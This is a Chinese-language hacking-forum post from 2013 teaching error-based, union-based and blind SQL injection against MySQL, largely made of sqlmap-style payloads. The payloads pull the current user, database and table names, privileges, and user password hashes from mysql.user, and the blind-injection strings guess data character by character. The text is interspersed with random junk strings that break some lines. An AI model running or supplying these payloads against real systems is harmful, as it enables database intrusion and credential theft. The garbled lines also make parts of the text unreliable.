放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
8 c( f) i' x0 Y. E0 ^9 ^
( E1 M: }1 I7 v9 z这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
3 m# V+ @ l# L1 t2 j 0 w; ?9 _0 v7 `5 N6 L3 C7 Q
分类标准 分类 备注 \/ a" j, Q5 A2 D2 [
按字段类型 整型注入,字符型注入 % z, ~ P. b$ G; N! y8 }+ i
按出现的位置 get注入,post注入,cookie注入,http header注入 1 ~& k( D/ O2 G8 t
然而高级注入是这样的% U2 Q: p; [ ?$ I/ X3 s
3 y9 I8 Y- ~2 @6 f) _; s/ i
高级注入分类 条件$ u6 u! U$ N- M/ @
error-based sql 数据库的错误回显可以返回,存在数据库,表结构+ L2 }0 v5 c) T% r, {. Q
union-based sql 能够使用union,存在数据库,表结构
1 H' ^/ X: O# W& Vblind sql 存在注入* m% }' J+ a3 _ h8 |
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。7 m6 U1 r2 M8 N0 Q9 Y9 z7 d& E! O
* u4 Y H; Y4 o. V& H9 R' ~好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火6 a5 M' K5 W) `! A2 g
3 z7 q5 d3 A6 q
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
8 j6 l2 L6 G8 l0 O
8 S" j, R7 w1 n2 f* C+ W) `4 g! A这里用mysql说明
7 V% S; ~9 |0 y5 u0 D
4 ~; r8 h6 D- z h7 ze注入坛子里很多了,请看戳我或者再戳我
o: G# j% Y z/ q. P * _5 v7 O, l5 f( x; k
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
8 g) _% z- t! c! T& x1 g4 H
) A) m8 R2 l# @: ?( g( G4 C$ T' F获取当前数据库用户名
/ [$ b9 b+ q3 h1 t9 m
, t. e! C; X+ e2 Z3 wUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
% S. u) t. o6 o: L1 tAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL1 ^7 ]5 Q3 k6 L. x) b8 S1 M4 u2 d/ ^
L, NULL#
$ x+ Q5 X" ~9 }+ q7 W注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
' w% N- D; V" g 3 p, U. w% s8 {! m e
获取数据库名
7 f, ^3 ?4 M6 J* g9 }1 o( j
* o' @3 e2 Y8 F) [7 k1 xUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#; R' m- f; w. o& r3 V
获取所有用户名. y" d8 j. _9 I% @% a2 Z/ Q
" ]7 `4 i8 P7 F$ e0 F' a. yUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES# y! ^0 \/ x. B% |% |$ d
查看当前用户权限( _0 s3 o0 W3 S
" e" a8 z$ Z2 P9 K4 ]7 @4 \* ?5 nUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
6 H" ?4 d) @ U) u尝试获取密码,当然需要有能读mysql数据库的权限
) ?, c$ N% P' M- ^' y) ^) d + ^5 e- ]+ j# J% C2 ^/ C8 D
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#5 i' m5 L, T$ e
获取表名,limit什么的自己搞啦/ Y b! @ |' T# P
3 W" z: {4 `9 U! z3 ZUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
l+ @% _: g7 }* Y- ]& w9 @获取字段名及其类型
9 D6 o/ P% |2 T6 }UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
' n0 r4 G A# ~+ `! Q: `
& m3 v& T% F$ r& S$ e1 Qb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。1 }- \/ W+ {: M/ ~/ w' ~: q
* b% }9 r5 Z) p4 D% C( z如:
0 K8 v% H7 p' Y获取当前用户名
4 i9 X6 B; S# J* R' k3 z F0 Q% `$ R H5 v
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 1168 Z5 I6 ~. }- q' i
获取当前数据库# Y) Z* |* K5 }" |- p, x: @8 ~9 f
/ S2 K2 @% ?5 u E; A: hAND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
9 y* V: w+ G; W/ {2 C$ ]6 D8 v# X获取表名' c) u0 S2 O5 Z
& X7 v3 Y Y3 F8 N- Z1 o4 |0 wAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51: W; F+ _5 B4 \# a# o: n
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。- Y. o4 p/ J* Y) n. f9 D
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。: o' @' Z# x& ? T5 Z
爆表$ d% R4 ^: o. F' B& _# ?
7 G3 @ K2 B! p: I; nAND EXISTS(select * from table)3 L( V9 A9 n- B/ d A# F* F
爆字段
0 r" m% k/ N+ G9 b! a2 Q 7 p' \4 N, [6 K" Q
AND EXISTS(select pwd from table)6 v. p% P. }6 T k" Q, V
盲注的变化就比较多了,由于篇幅,只是举个例子而已。6 Q8 v8 ]& B* V8 h$ i. w
3 ` i, m c+ i+ T% O本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。0 T) ^ {3 o- V, ^: p
|
发表于 2013-7-16 20:31:26
收藏
分享
支持
反对